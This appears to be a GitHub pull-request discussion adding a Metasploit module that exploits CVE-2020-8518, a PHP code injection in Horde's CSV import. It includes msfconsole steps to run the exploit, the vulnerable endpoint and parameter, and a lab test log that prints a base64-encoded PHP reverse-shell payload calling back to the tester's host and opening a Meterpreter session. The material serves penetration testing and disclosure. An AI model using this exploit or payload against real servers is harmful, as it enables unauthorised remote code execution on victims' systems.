Add 'Horde CSV import arbitrary PHP code execution' (CVE-2020-8518)

[cyrus-and]

This adds a module for the vulnerability in the subject. Follows an excerpt from the documentation.

Vulnerable Application

The Horde project comprises several standalone applications and libraries, the Horde Groupware Webmail Edition suite (tested version 5.2.22) bundles several of them by default, among those, Data (Horde Data API) is a library used to manage data import/export in several formats, e.g., CSV, iCalendar, vCard, etc. This library up to version 2.1.4 (included) is vulnerable to PHP code injection.

Find more information in the original advisory.

Verification Steps

1. Install the application (see below)
2. Start msfconsole
3. Do: use exploit/multi/http/horde_csv_rce
4. Do: set payload php/meterpreter/reverse_tcp
5. Do: set lhost [ATTACKER IP]
6. Do: set rhost [TARGET IP]
7. Do: set username [username]
8. Do: set password [password]
9. Do: exploit
10. A session should open

Downgrade the Horde Data API package if needed:

pear uninstall --ignore-errors horde/horde_data-2.1.5
pear install --ignore-errors horde/horde_data-2.1.4

---

This is my first MSF module submission, I apologize if something's wrong or missing.

[space-r7]

Hi @cyrus-and, thank you for submitting your module! I have a few comments that are mostly based on style.

[cyrus-and]

Hi @cyrus-and, thank you for submitting your module!

Thanks for the review!

Feel free to eventually squash all the commits, I took advantage of the GitHub interface to accept your proposed changes.

[space-r7]

Had a few issues getting the software installed, but finally got to test:

msf5 > use exploit/multi/http/horde_csv_rce
msf5 exploit(multi/http/horde_csv_rce) > set rhosts 172.16.215.227
rhosts => 172.16.215.227
msf5 exploit(multi/http/horde_csv_rce) > set lhost 172.16.215.1
lhost => 172.16.215.1
msf5 exploit(multi/http/horde_csv_rce) > set username blah
username => blah
msf5 exploit(multi/http/horde_csv_rce) > set password password
password => password
msf5 exploit(multi/http/horde_csv_rce) > set verbose true
verbose => true
msf5 exploit(multi/http/horde_csv_rce) > run

[*] Started reverse TCP handler on 172.16.215.1:4444 
[+] Logged in as blah:password
[*] Uploading jbKQiLUt.csv
[+] CSV file uploaded
[*] Sending payload: eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNi4yMTUuMSc7ICRwb3J0ID0gNDQ0NDsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFjaygi.TmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3Vob3Npbl9ieXBhc3MoKTsgfSBlbHNlIHsgZXZhbCgkYik7IH0gZGllKCk7))
[*] Sending stage (38288 bytes) to 172.16.215.227
[*] Meterpreter session 1 opened (172.16.215.1:4444 -> 172.16.215.227:48144) at 2020-03-23 07:27:20 -0500

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : ubuntu
OS          : Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64
Meterpreter : php/linux

I also changed a few things: randomized the uploaded file, added a vprint_status statement, and removed the threading part. I haven't had any issues testing, but we can add that back if it is necessary for something I'm not seeing.

[space-r7]

Release Notes

An exploit module is available for the Horde Data API that gets bundled with software such as Horde Groupware Webmail Edition Suite. The Horde Data API before and including v2.1.4 has functionality to handle importing/exporting data such as from CSV files, but fails to properly escape strings while parsing the data. An authenticated user can gain code execution by uploading a CSV file and submitting the payload in the quote parameter of a POST request to mnemo/data.php.

[cyrus-and]

Had a few issues getting the software installed

Thank you! Installing Horde from scratch is not the most pleasant thing to do...